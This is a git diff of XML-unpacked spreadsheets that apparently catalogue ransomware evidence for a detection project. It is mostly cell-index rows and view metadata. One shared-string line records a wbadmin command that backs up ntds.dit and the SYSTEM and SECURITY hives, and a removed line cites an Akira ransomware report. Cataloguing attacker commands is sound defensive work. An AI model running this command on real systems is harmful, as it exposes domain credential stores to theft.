+      </c>
+      <c r="E1470" s="1"/>
+      <c r="L1470" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1471" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1471" s="1" t="s">
+        <v>3408</v>
+      </c>
+      <c r="B1471" s="1" t="s">
+        <v>3397</v>
+      </c>
+      <c r="D1471" s="1" t="s">
+        <v>3400</v>
+      </c>
+      <c r="E1471" s="1"/>
+      <c r="L1471" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1472" spans="1:12" ht="51" x14ac:dyDescent="0.2">
+      <c r="A1472" s="1" t="s">
+        <v>3415</v>
+      </c>
+      <c r="B1472" s="1" t="s">
+        <v>3411</v>
+      </c>
+      <c r="D1472" s="1" t="s">
+        <v>3410</v>
+      </c>
+      <c r="E1472" s="1"/>
+      <c r="L1472" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1473" spans="1:12" ht="34" x14ac:dyDescent="0.2">
+      <c r="A1473" s="1" t="s">
+        <v>3416</v>
+      </c>
+      <c r="B1473" s="1" t="s">
+        <v>3203</v>
+      </c>
+      <c r="D1473" s="1" t="s">
+        <v>3412</v>
+      </c>
+      <c r="E1473" s="1"/>
+      <c r="L1473" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1474" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1474" s="1" t="s">
+        <v>3417</v>
+      </c>
+      <c r="B1474" s="1" t="s">
+        <v>3203</v>
+      </c>
+      <c r="D1474" s="1" t="s">
+        <v>3413</v>
+      </c>
+      <c r="E1474" s="1"/>
+      <c r="L1474" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1475" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1475" s="1" t="s">
+        <v>3418</v>
+      </c>
+      <c r="B1475" s="1" t="s">
+        <v>3203</v>
+      </c>
+      <c r="D1475" s="1" t="s">
+        <v>3414</v>
+      </c>
+      <c r="E1475" s="1"/>
+      <c r="L1475" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1476" spans="1:12" ht="34" x14ac:dyDescent="0.2">
+      <c r="A1476" s="1" t="s">
+        <v>3430</v>
+      </c>
+      <c r="D1476" s="1" t="s">
+        <v>3419</v>
+      </c>
+      <c r="E1476" s="1"/>
+      <c r="L1476" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1477" spans="1:12" ht="34" x14ac:dyDescent="0.2">
+      <c r="A1477" s="1" t="s">
+        <v>3431</v>
+      </c>
+      <c r="D1477" s="1" t="s">
+        <v>3420</v>
+      </c>
+      <c r="E1477" s="1"/>
+      <c r="L1477" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1478" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1478" s="1" t="s">
+        <v>3432</v>
+      </c>
+      <c r="B1478" s="1" t="s">
+        <v>3128</v>
+      </c>
+      <c r="D1478" s="1" t="s">
+        <v>3421</v>
+      </c>
+      <c r="E1478" s="1"/>
+      <c r="L1478" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1479" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1479" s="1" t="s">
+        <v>3433</v>
+      </c>
+      <c r="B1479" s="1" t="s">
+        <v>3128</v>
+      </c>
+      <c r="D1479" s="1" t="s">
+        <v>3422</v>
+      </c>
+      <c r="E1479" s="1"/>
+      <c r="L1479" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1480" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1480" s="1" t="s">
+        <v>3434</v>
+      </c>
+      <c r="B1480" s="1" t="s">
+        <v>3128</v>
+      </c>
+      <c r="D1480" s="1" t="s">
+        <v>3423</v>
+      </c>
+      <c r="E1480" s="1"/>
+      <c r="L1480" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1481" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1481" s="1" t="s">
+        <v>3435</v>
+      </c>
+      <c r="B1481" s="1" t="s">
+        <v>3128</v>
+      </c>
+      <c r="D1481" s="1" t="s">
+        <v>3424</v>
+      </c>
+      <c r="E1481" s="1"/>
+      <c r="L1481" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1482" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1482" s="1" t="s">
+        <v>3436</v>
+      </c>
+      <c r="B1482" s="1" t="s">
+        <v>3128</v>
+      </c>
+      <c r="D1482" s="1" t="s">
+        <v>3425</v>
+      </c>
+      <c r="E1482" s="1"/>
+      <c r="L1482" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1483" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1483" s="1" t="s">
+        <v>3437</v>
+      </c>
+      <c r="B1483" s="1" t="s">
+        <v>3128</v>
+      </c>
+      <c r="D1483" s="1" t="s">
+        <v>3426</v>
+      </c>
+      <c r="E1483" s="1"/>
+      <c r="L1483" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1484" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1484" s="1" t="s">
+        <v>3438</v>
+      </c>
+      <c r="B1484" s="1" t="s">
+        <v>3128</v>
+      </c>
+      <c r="D1484" s="1" t="s">
+        <v>3427</v>
+      </c>
+      <c r="E1484" s="1"/>
+      <c r="L1484" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1485" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1485" s="1" t="s">
+        <v>3439</v>
+      </c>
+      <c r="B1485" s="1" t="s">
+        <v>3128</v>
+      </c>
+      <c r="D1485" s="1" t="s">
+        <v>3428</v>
+      </c>
+      <c r="E1485" s="1"/>
+      <c r="L1485" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1486" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1486" s="1" t="s">
+        <v>3440</v>
+      </c>
+      <c r="B1486" s="1" t="s">
+        <v>3128</v>
+      </c>
+      <c r="D1486" s="1" t="s">
+        <v>3429</v>
+      </c>
+      <c r="E1486" s="1"/>
+      <c r="L1486" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1487" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1487" s="1" t="s">
+        <v>3443</v>
+      </c>
+      <c r="B1487" s="1" t="s">
+        <v>3128</v>
+      </c>
+      <c r="D1487" s="1" t="s">
+        <v>3441</v>
+      </c>
+      <c r="E1487" s="1"/>
+      <c r="L1487" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1488" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1488" s="1" t="s">
+        <v>3444</v>
+      </c>
+      <c r="B1488" s="1" t="s">
+        <v>3128</v>
+      </c>
+      <c r="D1488" s="1" t="s">
+        <v>3442</v>
+      </c>
+      <c r="E1488" s="1"/>
+      <c r="L1488" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1489" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1489" s="1" t="s">
+        <v>3451</v>
+      </c>
+      <c r="B1489" s="1" t="s">
+        <v>3445</v>
+      </c>
+      <c r="D1489" s="1" t="s">
+        <v>3445</v>
+      </c>
+      <c r="E1489" s="1"/>
+      <c r="L1489" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1490" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1490" s="1" t="s">
+        <v>3452</v>
+      </c>
+      <c r="B1490" s="1" t="s">
+        <v>3445</v>
+      </c>
+      <c r="D1490" s="1" t="s">
+        <v>3446</v>
+      </c>
+      <c r="E1490" s="1"/>
+      <c r="L1490" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1491" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1491" s="1" t="s">
+        <v>3453</v>
+      </c>
+      <c r="B1491" s="1" t="s">
+        <v>3445</v>
+      </c>
+      <c r="D1491" s="1" t="s">
+        <v>3447</v>
+      </c>
+      <c r="E1491" s="1"/>
+      <c r="L1491" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1492" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1492" s="1" t="s">
+        <v>3454</v>
+      </c>
+      <c r="B1492" s="1" t="s">
+        <v>3445</v>
+      </c>
+      <c r="D1492" s="1" t="s">
+        <v>3448</v>
+      </c>
+      <c r="E1492" s="1"/>
+      <c r="L1492" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1493" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1493" s="1" t="s">
+        <v>3455</v>
+      </c>
+      <c r="B1493" s="1" t="s">
+        <v>3445</v>
+      </c>
+      <c r="D1493" s="1" t="s">
+        <v>3445</v>
+      </c>
+      <c r="E1493" s="1"/>
+      <c r="L1493" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1494" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1494" s="1" t="s">
+        <v>3456</v>
+      </c>
+      <c r="B1494" s="1" t="s">
+        <v>3445</v>
+      </c>
+      <c r="D1494" s="1" t="s">
+        <v>3445</v>
+      </c>
+      <c r="E1494" s="1"/>
+      <c r="L1494" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1495" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1495" s="1" t="s">
+        <v>3457</v>
+      </c>
+      <c r="B1495" s="1" t="s">
+        <v>3445</v>
+      </c>
+      <c r="D1495" s="1" t="s">
+        <v>3449</v>
+      </c>
+      <c r="E1495" s="1"/>
+      <c r="L1495" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1496" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1496" s="1" t="s">
+        <v>3458</v>
+      </c>
+      <c r="B1496" s="1" t="s">
+        <v>3445</v>
+      </c>
+      <c r="D1496" s="1" t="s">
+        <v>3450</v>
+      </c>
+      <c r="E1496" s="1"/>
+      <c r="L1496" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1497" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1497" s="1" t="s">
+        <v>3459</v>
+      </c>
+      <c r="B1497" s="1" t="s">
+        <v>3445</v>
+      </c>
+      <c r="D1497" s="1" t="s">
+        <v>3445</v>
+      </c>
+      <c r="E1497" s="1"/>
+      <c r="L1497" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1498" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1498" s="1" t="s">
+        <v>3462</v>
+      </c>
+      <c r="B1498" s="1" t="s">
+        <v>3464</v>
+      </c>
+      <c r="D1498" s="1" t="s">
+        <v>3460</v>
+      </c>
+      <c r="E1498" s="1"/>
+      <c r="L1498" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1499" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1499" s="1" t="s">
+        <v>3463</v>
+      </c>
+      <c r="B1499" s="1" t="s">
+        <v>3464</v>
+      </c>
+      <c r="D1499" s="1" t="s">
+        <v>3461</v>
+      </c>
+      <c r="E1499" s="1"/>
+      <c r="L1499" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1500" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1500" s="1" t="s">
+        <v>3470</v>
+      </c>
+      <c r="B1500" s="1" t="s">
+        <v>3475</v>
+      </c>
+      <c r="D1500" s="1" t="s">
+        <v>3465</v>
+      </c>
+      <c r="E1500" s="1"/>
+      <c r="L1500" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1501" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1501" s="1" t="s">
+        <v>3471</v>
+      </c>
+      <c r="B1501" s="1" t="s">
+        <v>3475</v>
+      </c>
+      <c r="D1501" s="1" t="s">
+        <v>3466</v>
+      </c>
+      <c r="E1501" s="1"/>
+      <c r="L1501" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1502" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1502" s="1" t="s">
+        <v>3472</v>
+      </c>
+      <c r="B1502" s="1" t="s">
+        <v>3475</v>
+      </c>
+      <c r="D1502" s="1" t="s">
+        <v>3467</v>
+      </c>
+      <c r="E1502" s="1"/>
+      <c r="L1502" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1503" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1503" s="1" t="s">
+        <v>3473</v>
+      </c>
+      <c r="B1503" s="1" t="s">
+        <v>3475</v>
+      </c>
+      <c r="D1503" s="1" t="s">
+        <v>3468</v>
+      </c>
+      <c r="E1503" s="1"/>
+      <c r="L1503" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1504" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1504" s="1" t="s">
+        <v>3474</v>
+      </c>
+      <c r="B1504" s="1" t="s">
+        <v>3475</v>
+      </c>
+      <c r="D1504" s="1" t="s">
+        <v>3469</v>
+      </c>
+      <c r="E1504" s="1"/>
+      <c r="L1504" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1505" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1505" s="1" t="s">
+        <v>3480</v>
+      </c>
+      <c r="B1505" s="1" t="s">
+        <v>3479</v>
+      </c>
+      <c r="D1505" s="1" t="s">
+        <v>3476</v>
+      </c>
+      <c r="E1505" s="1"/>
+      <c r="L1505" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1506" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1506" s="1" t="s">
+        <v>3481</v>
+      </c>
+      <c r="B1506" s="1" t="s">
+        <v>3479</v>
+      </c>
+      <c r="D1506" s="1" t="s">
+        <v>3477</v>
+      </c>
+      <c r="E1506" s="1"/>
+      <c r="L1506" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1507" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1507" s="1" t="s">
+        <v>3482</v>
+      </c>
+      <c r="B1507" s="1" t="s">
+        <v>3479</v>
+      </c>
+      <c r="D1507" s="1" t="s">
+        <v>3478</v>
+      </c>
+      <c r="E1507" s="1"/>
+      <c r="L1507" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1508" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1508" s="1" t="s">
+        <v>3486</v>
+      </c>
+      <c r="B1508" s="1" t="s">
+        <v>3485</v>
+      </c>
+      <c r="D1508" s="1" t="s">
+        <v>3483</v>
+      </c>
+      <c r="E1508" s="1"/>
+      <c r="L1508" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1509" spans="1:12" ht="34" x14ac:dyDescent="0.2">
+      <c r="A1509" s="1" t="s">
+        <v>3487</v>
+      </c>
+      <c r="B1509" s="1" t="s">
+        <v>3485</v>
+      </c>
+      <c r="D1509" s="1" t="s">
+        <v>3484</v>
+      </c>
+      <c r="E1509" s="1"/>
+      <c r="L1509" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1510" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1510" s="1" t="s">
+        <v>3496</v>
+      </c>
+      <c r="B1510" s="1" t="s">
+        <v>3485</v>
+      </c>
+      <c r="D1510" s="1" t="s">
+        <v>3488</v>
+      </c>
+      <c r="E1510" s="1"/>
+      <c r="L1510" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1511" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1511" s="1" t="s">
+        <v>3497</v>
+      </c>
+      <c r="B1511" s="1" t="s">
+        <v>3485</v>
+      </c>
+      <c r="D1511" s="1" t="s">
+        <v>3489</v>
+      </c>
+      <c r="E1511" s="1"/>
+      <c r="L1511" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1512" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1512" s="1" t="s">
+        <v>3498</v>
+      </c>
+      <c r="B1512" s="1" t="s">
+        <v>3485</v>
+      </c>
+      <c r="D1512" s="1" t="s">
+        <v>3490</v>
+      </c>
+      <c r="E1512" s="1"/>
+      <c r="L1512" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1513" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1513" s="1" t="s">
+        <v>3499</v>
+      </c>
+      <c r="D1513" s="1" t="s">
+        <v>3491</v>
+      </c>
+      <c r="E1513" s="1"/>
+      <c r="L1513" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1514" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1514" s="1" t="s">
+        <v>3500</v>
+      </c>
+      <c r="D1514" s="1" t="s">
+        <v>3492</v>
+      </c>
+      <c r="E1514" s="1"/>
+      <c r="L1514" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1515" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1515" s="1" t="s">
+        <v>3501</v>
+      </c>
+      <c r="D1515" s="1" t="s">
+        <v>3493</v>
+      </c>
+      <c r="E1515" s="1"/>
+      <c r="L1515" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1516" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1516" s="1" t="s">
+        <v>3502</v>
+      </c>
+      <c r="B1516" s="1" t="s">
+        <v>3495</v>
+      </c>
+      <c r="D1516" s="1" t="s">
+        <v>3494</v>
+      </c>
+      <c r="E1516" s="1"/>
+      <c r="L1516" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="1517" spans="1:12" ht="17" x14ac:dyDescent="0.2">
+      <c r="A1517" s="1" t="s">
+        <v>3503</v>
+      </c>
+      <c r="B1517" s="1" t="s">
+        <v>3479</v>
+      </c>
+      <c r="D1517" s="1" t="s">
+        <v>3504</v>
+      </c>
+      <c r="E1517" s="1"/>
+      <c r="L1517" s="1" t="s">
+        <v>3391</v>
       </c>
     </row>
   </sheetData>
@@ -59492,11 +61260,11 @@
 
 <file path=xl/worksheets/sheet3.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{079F2AE5-5FB3-2247-8F3F-BB9788663E70}">
-  <dimension ref="A1:K123"/>
+  <dimension ref="A1:K124"/>
   <sheetViews>
     <sheetView workbookViewId="0">
       <pane ySplit="1" topLeftCell="A93" activePane="bottomLeft" state="frozen"/>
-      <selection pane="bottomLeft" activeCell="K127" sqref="K127"/>
+      <selection pane="bottomLeft" activeCell="B124" sqref="B124"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
@@ -61107,6 +62875,26 @@
       </c>
       <c r="K123" s="1" t="s">
         <v>3214</v>
+      </c>
+    </row>
+    <row r="124" spans="1:11" ht="17" x14ac:dyDescent="0.2">
+      <c r="A124" t="s">
+        <v>1313</v>
+      </c>
+      <c r="B124" t="s">
+        <v>3161</v>
+      </c>
+      <c r="D124" t="s">
+        <v>213</v>
+      </c>
+      <c r="E124" s="1" t="s">
+        <v>3373</v>
+      </c>
+      <c r="F124" t="s">
+        <v>992</v>
+      </c>
+      <c r="K124" s="1" t="s">
+        <v>3333</v>
       </c>
     </row>
   </sheetData>
@@ -62025,12 +63813,12 @@
 
 <file path=xl/worksheets/sheet7.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{C059C52C-640B-CF44-8F28-42BC59DA89EE}">
-  <dimension ref="A1:H321"/>
+  <dimension ref="A1:H331"/>
   <sheetViews>
     <sheetView workbookViewId="0">
-      <pane ySplit="1" topLeftCell="A299" activePane="bottomLeft" state="frozen"/>
+      <pane ySplit="1" topLeftCell="A312" activePane="bottomLeft" state="frozen"/>
       <selection activeCell="C1" sqref="C1"/>
-      <selection pane="bottomLeft" activeCell="D329" sqref="D329"/>
+      <selection pane="bottomLeft" activeCell="H339" sqref="H339"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
@@ -65813,6 +67601,116 @@
       </c>
       <c r="H321" s="1" t="s">
         <v>3214</v>
+      </c>
+    </row>
+    <row r="322" spans="1:8" ht="17" x14ac:dyDescent="0.2">
+      <c r="A322" t="s">
+        <v>1511</v>
+      </c>
+      <c r="D322" t="s">
+        <v>401</v>
+      </c>
+      <c r="H322" s="1" t="s">
+        <v>3333</v>
+      </c>
+    </row>
+    <row r="323" spans="1:8" ht="17" x14ac:dyDescent="0.2">
+      <c r="A323" t="s">
+        <v>1512</v>
+      </c>
+      <c r="D323" t="s">
+        <v>400</v>
+      </c>
+      <c r="H323" s="1" t="s">
+        <v>3333</v>
+      </c>
+    </row>
+    <row r="324" spans="1:8" ht="17" x14ac:dyDescent="0.2">
+      <c r="A324" t="s">
+        <v>1513</v>
+      </c>
+      <c r="D324" t="s">
+        <v>97</v>
+      </c>
+      <c r="H324" s="1" t="s">
+        <v>3333</v>
+      </c>
+    </row>
+    <row r="325" spans="1:8" ht="17" x14ac:dyDescent="0.2">
+      <c r="A325" t="s">
+        <v>1514</v>
+      </c>
+      <c r="D325" t="s">
+        <v>713</v>
+      </c>
+      <c r="H325" s="1" t="s">
+        <v>3333</v>
+      </c>
+    </row>
+    <row r="326" spans="1:8" ht="17" x14ac:dyDescent="0.2">
+      <c r="A326" t="s">
+        <v>1515</v>
+      </c>
+      <c r="D326" t="s">
+        <v>412</v>
+      </c>
+      <c r="H326" s="1" t="s">
+        <v>3333</v>
+      </c>
+    </row>
+    <row r="327" spans="1:8" ht="17" x14ac:dyDescent="0.2">
+      <c r="A327" t="s">
+        <v>1516</v>
+      </c>
+      <c r="G327" s="1" t="s">
+        <v>3352</v>
+      </c>
+      <c r="H327" s="1" t="s">
+        <v>3333</v>
+      </c>
+    </row>
+    <row r="328" spans="1:8" ht="17" x14ac:dyDescent="0.2">
+      <c r="A328" t="s">
+        <v>1517</v>
+      </c>
+      <c r="D328" t="s">
+        <v>769</v>
+      </c>
+      <c r="H328" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="329" spans="1:8" ht="17" x14ac:dyDescent="0.2">
+      <c r="A329" t="s">
+        <v>1518</v>
+      </c>
+      <c r="D329" t="s">
+        <v>3395</v>
+      </c>
+      <c r="H329" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="330" spans="1:8" ht="17" x14ac:dyDescent="0.2">
+      <c r="A330" t="s">
+        <v>1519</v>
+      </c>
+      <c r="D330" t="s">
+        <v>403</v>
+      </c>
+      <c r="H330" s="1" t="s">
+        <v>3391</v>
+      </c>
+    </row>
+    <row r="331" spans="1:8" ht="17" x14ac:dyDescent="0.2">
+      <c r="A331" t="s">
+        <v>1520</v>
+      </c>
+      <c r="D331" t="s">
+        <v>3505</v>
+      </c>
+      <c r="H331" s="1" t="s">
+        <v>3391</v>
       </c>
     </row>
   </sheetData>

--- a/delta2/lib_evidence/eid-ransom.xlsx
+++ b/delta2/lib_evidence/eid-ransom.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_evidence/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D01B8B9F-B04D-2443-A6D9-DBBE91F7025D}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{BD0CD540-E9AA-6F4B-A9C4-A1CA5E85E48C}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="100" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{503C4303-42A1-DB4B-BD90-2FBAE899660F}"/>
   </bookViews>
@@ -36725,8 +36725,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{9549A292-5E18-1D44-9D7A-060851331C4E}">
   <dimension ref="A1:L1517"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="C1" workbookViewId="0">
-      <pane ySplit="1" topLeftCell="A1484" activePane="bottomLeft" state="frozen"/>
+    <sheetView tabSelected="1" workbookViewId="0">
+      <pane ySplit="1" topLeftCell="A1483" activePane="bottomLeft" state="frozen"/>
       <selection pane="bottomLeft" activeCell="L1504" sqref="L1504:L1517"/>
     </sheetView>
   </sheetViews>

--- a/delta2/lib_evidence/eid-ransom.xlsx
+++ b/delta2/lib_evidence/eid-ransom.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_evidence/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{7778EC44-BD8A-D143-B7C2-BB296A7BCFBF}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{55632339-B525-934F-B34A-2F11DC07A870}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{503C4303-42A1-DB4B-BD90-2FBAE899660F}"/>
   </bookViews>
@@ -28,10 +28,10 @@
   </sheets>
   <calcPr calcId="191029"/>
   <pivotCaches>
-    <pivotCache cacheId="13" r:id="rId13"/>
-    <pivotCache cacheId="14" r:id="rId14"/>
-    <pivotCache cacheId="15" r:id="rId15"/>
-    <pivotCache cacheId="16" r:id="rId16"/>
+    <pivotCache cacheId="18" r:id="rId13"/>
+    <pivotCache cacheId="19" r:id="rId14"/>
+    <pivotCache cacheId="20" r:id="rId15"/>
+    <pivotCache cacheId="21" r:id="rId16"/>
   </pivotCaches>
   <extLst>
     <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}">
@@ -53,7 +53,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="8654" uniqueCount="3668">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="8735" uniqueCount="3705">
   <si>
     <t>delta_pid</t>
   </si>
@@ -11028,9 +11028,6 @@
     <t>wbadmin.exe start backup -backuptarget:\\127.0.0.1\C$\ProgramData\ -include":C:\windows\NTDS\ntds.dit,C:\windows\system32\config\SYSTEM,C:\windows\system32\config\SECURITY" -quiet</t>
   </si>
   <si>
-    <t>{"date": "2025-07", "url": "https://thedfirreport.com/2025/08/05/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira/", "tags": ["akira"]}</t>
-  </si>
-  <si>
     <t>wbadmin, ntds</t>
   </si>
   <si>
